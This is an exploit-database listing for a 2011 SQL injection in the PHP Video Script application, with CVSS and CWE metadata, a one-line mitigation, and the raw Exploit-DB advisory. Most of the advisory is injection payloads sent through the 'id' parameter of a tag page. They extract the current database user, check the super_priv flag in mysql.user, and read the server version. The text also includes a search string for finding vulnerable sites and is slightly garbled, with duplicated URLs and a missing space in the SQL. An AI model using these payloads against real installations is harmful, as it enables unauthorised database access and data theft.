header-logo
Suggest Exploit
vendor:
PHP Video Script
by:
longrifle0x
9.3
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHP Video Script
Affected Version From: 1
Affected Version To: 1
Patch Exists: YES
Related CWE: CVE-2011-2511
CPE: a:alurian:php_video_script
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2011

php video script SQL Injection Vulnerability

Discovered a vulnerability in video_tags, vulnerability is SQL injection. link: http://localhost:80/tag <http://localhost/tag> vulnerability link: http://localhost:80/tag <http://localhost/tag>' http://localhost:80/tag'/index.php?id=1 <http://localhost/tag'/index.php?id=1> [GET][id=-1][CURRENT_USER() http://localhost:80/tag'/index.php?id=1[GET][id=-1][SELECT(CASE <http://localhost/tag'/index.php?id=1[GET][id=-1][SELECT(CASE> WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END) http://localhost:80/tag'/index.php?id=1[GET][id=-1][MID((VERSION()),1,6) <http://localhost/tag'/index.php?id=1[GET][id=-1][MID((VERSION()),1,6)>

Mitigation:

Update to the latest version of the software, Use parameterized queries, Use an input validation library
Source

Exploit-DB raw data:

######################################################
# Exploit Title: php video script SQL Injection Vulnerability
# Date: 2011-25-11
# Author: longrifle0x
# Home page: www.security-research.ge
# software: PHP video script
# Download:http://www.alurian.com/php-video-script/
# Tools: SQLMAP
# Drok: Copyright � PHP Video Script powered by Prismotube All Rights Reserved
######################################################

*DESCRIPTION
Discovered a vulnerability in video_tags,

vulnerability is SQL injection.

*Exploitation*

link: http://localhost:80/tag <http://localhost/tag>

vulnerability link: http://localhost:80/tag <http://localhost/tag>'

http://localhost:80/tag'/index.php?id=1
<http://localhost/tag'/index.php?id=1> [GET][id=-1][CURRENT_USER()

http://localhost:80/tag'/index.php?id=1[GET][id=-1][SELECT(CASE
<http://localhost/tag'/index.php?id=1[GET][id=-1][SELECT(CASE> WHEN
((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y')
THEN 1 ELSE 0 END)

http://localhost:80/tag'/index.php?id=1[GET][id=-1][MID((VERSION()),1,6)
<http://localhost/tag'/index.php?id=1[GET][id=-1][MID((VERSION()),1,6)>